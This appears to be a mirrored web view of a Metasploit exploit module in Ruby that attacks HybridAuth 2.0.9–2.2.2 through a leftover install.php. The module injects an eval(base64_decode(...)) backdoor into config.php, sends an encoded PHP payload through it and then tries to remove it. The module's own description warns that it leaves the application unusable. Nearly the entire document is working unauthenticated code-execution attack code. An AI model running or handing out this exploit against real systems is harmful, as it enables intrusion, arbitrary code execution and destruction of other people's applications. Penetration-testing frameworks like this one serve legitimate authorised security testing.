Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking # application config.php is overwritten

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'HybridAuth install.php PHP Code Execution',

16
        'Description' => %q{

17
          This module exploits a PHP code execution vulnerability in

18
          HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'

19
          is not removed after installation allowing unauthenticated users to

20
          write PHP code to the application configuration file 'config.php'.

21


22
          Note: This exploit will overwrite the application configuration file

23
          rendering the application unusable.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Pichaya Morimoto', # Discovery and PoC

28
          'bcoles' # Metasploit

29
        ],

30
        'References' => [

31
          ['EDB', '34273'],

32
          ['OSVDB', '109838']

33
        ],

34
        'Arch' => ARCH_PHP,

35
        'Platform' => 'php',

36
        'Targets' => [

37
          # Tested:

38
          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)

39
          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]

40
        ],

41
        'Privileged' => false,

42
        'DisclosureDate' => '2014-08-04',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])

55
      ]

56
    )

57
  end

58


59
  #

60
  # Check:

61
  # * install.php exists

62
  # * config.php is writable

63
  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2

64
  #

65
  def check

66
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')

67
    if !res

68
      vprint_error "Connection failed"

69
      return Exploit::CheckCode::Unknown

70
    elsif res.code == 404

71
      vprint_error "Could not find install.php"

72
    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</

73
      vprint_error "#{$1} is not writable"

74
    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</

75
      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first

76
      vprint_status "Found version: #{version}"

77
      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/

78
        return Exploit::CheckCode::Vulnerable

79
      else

80
        vprint_error "HybridAuth version #{version} is not vulnerable"

81
      end

82
    end

83
    Exploit::CheckCode::Safe

84
  end

85


86
  #

87
  # Exploit

88
  #

89
  def exploit

90
    # check vuln

91
    if check != Exploit::CheckCode::Vulnerable

92
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"

93
    end

94


95
    # write backdoor

96
    print_status "Writing backdoor to config.php"

97
    payload_param = rand(1000)

98
    res = send_request_cgi(

99
      'method' => 'POST',

100
      'uri' => normalize_uri(target_uri.path, 'install.php'),

101
      'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"

102
    )

103
    if !res

104
      fail_with Failure::Unknown, "#{peer} - Connection failed"

105
    elsif res.body =~ /Installation completed/

106
      print_good "Wrote backdoor successfully"

107
    else

108
      fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"

109
    end

110


111
    # execute payload

112
    code = Rex::Text.encode_base64(payload.encoded)

113
    print_status "Sending payload to config.php backdoor (#{code.length} bytes)"

114
    res = send_request_cgi({

115
      'method' => 'POST',

116
      'uri' => normalize_uri(target_uri.path, 'config.php'),

117
      'data' => "#{payload_param}=#{code}"

118
    }, 5)

119
    if !res

120
      print_warning "No response"

121
    elsif res.code == 404

122
      fail_with Failure::NotFound, "#{peer} - Could not find config.php"

123
    elsif res.code == 200 || res.code == 500

124
      print_good "Sent payload successfully"

125
    end

126


127
    # remove backdoor

128
    print_status "Removing backdoor from config.php"

129
    res = send_request_cgi(

130
      'method' => 'POST',

131
      'uri' => normalize_uri(target_uri.path, 'install.php'),

132
      'data' => 'OPENID_ADAPTER_STATUS='

133
    )

134
    if !res

135
      print_error "Connection failed"

136
    elsif res.body =~ /Installation completed/

137
      print_good "Removed backdoor successfully"

138
    else

139
      print_warning "Could not remove payload from config.php"

140
    end

141
  end

142
end

143


144